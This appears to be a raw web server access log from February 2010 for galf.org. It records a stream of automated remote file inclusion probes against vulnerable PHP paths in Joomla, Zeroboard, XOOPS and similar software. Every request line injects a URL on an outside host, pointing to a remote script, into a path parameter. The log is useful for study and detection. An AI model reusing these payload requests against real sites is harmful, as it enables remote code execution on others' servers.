200.93.147.154 - - [08/Feb/2010:01:05:32 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:06:11 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:06:11 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:06:11 -0800] "GET /logs/access.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:06:53 -0800] "GET /logs/access_100201.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:07:19 -0800] "GET /logs/access_100201.log///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:07:40 -0800] "GET /logs/access_100111.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:08:21 -0800] "GET /delete_all.php?board_skin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:08:21 -0800] "GET /logs/access.log%20%20/delete_all.php?board_skin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:08:21 -0800] "GET /logs/delete_all.php?board_skin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:08:24 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:08:29 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:08:29 -0800] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:08:51 -0800] "GET /logs/access_100111.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:09:38 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:09:40 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:09:41 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [08/Feb/2010:01:09:48 -0800] "GET /logs/access.log///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [08/Feb/2010:01:09:59 -0800] "GET //lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:10:03 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:10:11 -0800] "GET /logs/access_100201.log%20%20/delete_all.php?board_skin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:10:27 -0800] "GET /logs/access_090831.log///lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:10:55 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:10:55 -0800] "GET /logs/access_091019.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:11:03 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:01:11:56 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:01:11:56 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:01:11:56 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:01:12:07 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:01:12:07 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:01:12:07 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:01:12:26 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [08/Feb/2010:01:12:51 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.230.162.220 - - [08/Feb/2010:01:12:51 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.230.162.220 - - [08/Feb/2010:01:12:52 -0800] "GET /logs/access.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.230.162.220 - - [08/Feb/2010:01:13:09 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.230.162.220 - - [08/Feb/2010:01:13:10 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.230.162.220 - - [08/Feb/2010:01:13:10 -0800] "GET /logs/access.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [08/Feb/2010:01:13:16 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:13:16 -0800] "GET /logs/access_091019.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:13:18 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [08/Feb/2010:01:13:18 -0800] "GET /logs/access.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.230.162.220 - - [08/Feb/2010:01:13:18 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.230.162.220 - - [08/Feb/2010:01:13:18 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.174.48.203 - - [08/Feb/2010:01:13:39 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
69.174.48.203 - - [08/Feb/2010:01:13:39 -0800] "GET /delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
69.174.48.203 - - [08/Feb/2010:01:13:39 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:13:43 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:13:43 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:13:43 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:13:47 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:14:01 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:14:01 -0800] "GET /logs/access_091019.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:14:06 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:14:06 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:14:06 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:01:14:57 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:15:00 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:15:00 -0800] "GET /logs/access_091019.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:15:06 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.221.175.60 - - [08/Feb/2010:01:15:23 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
89.221.175.60 - - [08/Feb/2010:01:15:24 -0800] "GET /delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
89.221.175.60 - - [08/Feb/2010:01:15:24 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:16:17 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:16:20 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:16:20 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:16:54 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.174.48.203 - - [08/Feb/2010:01:16:57 -0800] "GET /logs/access_100201.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:17:08 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:17:11 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:17:11 -0800] "GET /logs/access_091019.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:17:25 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:17:25 -0800] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:17:25 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:18:23 -0800] "GET /skin/ggambo1100_gallery/setup.php?setup[use_category]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:18:29 -0800] "GET /logs/skin/ggambo1100_gallery/setup.php?setup[use_category]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:18:30 -0800] "GET /logs/access_091228.log%20%20/skin/ggambo1100_gallery/setup.php?setup[use_category]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [08/Feb/2010:01:19:21 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [08/Feb/2010:01:19:22 -0800] "GET /delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [08/Feb/2010:01:19:22 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:19:46 -0800] "GET /logs/access_100201.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.221.175.60 - - [08/Feb/2010:01:19:50 -0800] "GET /logs/access_100201.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:20:12 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:20:17 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:20:17 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [08/Feb/2010:01:21:04 -0800] "GET /logs/access_100118.log///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [08/Feb/2010:01:21:04 -0800] "GET //amboard/?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [08/Feb/2010:01:21:04 -0800] "GET /logs///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [08/Feb/2010:01:21:13 -0800] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:21:15 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [08/Feb/2010:01:21:17 -0800] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [08/Feb/2010:01:21:18 -0800] "GET /logs/access_091123.log///index.php?_SERVER[DOCUMENT_ROOT]=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:21:18 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [08/Feb/2010:01:21:20 -0800] "GET /logs/access_090720.log//include/admin.lib.inc.php?site_path=http://www.3weekbender.com/a1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [08/Feb/2010:01:21:20 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.3weekbender.com/a1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [08/Feb/2010:01:21:20 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.3weekbender.com/a1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:21:23 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [08/Feb/2010:01:22:00 -0800] "GET /logs/access_090928.log///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [08/Feb/2010:01:22:22 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [08/Feb/2010:01:22:22 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [08/Feb/2010:01:22:22 -0800] "GET /logs/access.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:22:38 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:22:39 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:22:54 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [08/Feb/2010:01:23:45 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.3weekbender.com/a1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [08/Feb/2010:01:23:45 -0800] "GET /logs/access_090720.log//include/admin.lib.inc.php?site_path=http://www.3weekbender.com/a1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [08/Feb/2010:01:23:45 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.3weekbender.com/a1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:23:47 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:23:51 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [08/Feb/2010:01:23:57 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [08/Feb/2010:01:23:57 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [08/Feb/2010:01:23:57 -0800] "GET /logs/access.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:23:59 -0800] "GET /logs/access_091019.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:24:07 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:24:23 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:24:23 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:25:07 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:25:07 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:25:07 -0800] "GET /logs/access_100201.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:25:07 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [08/Feb/2010:01:25:07 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [08/Feb/2010:01:25:07 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [08/Feb/2010:01:26:09 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:26:11 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
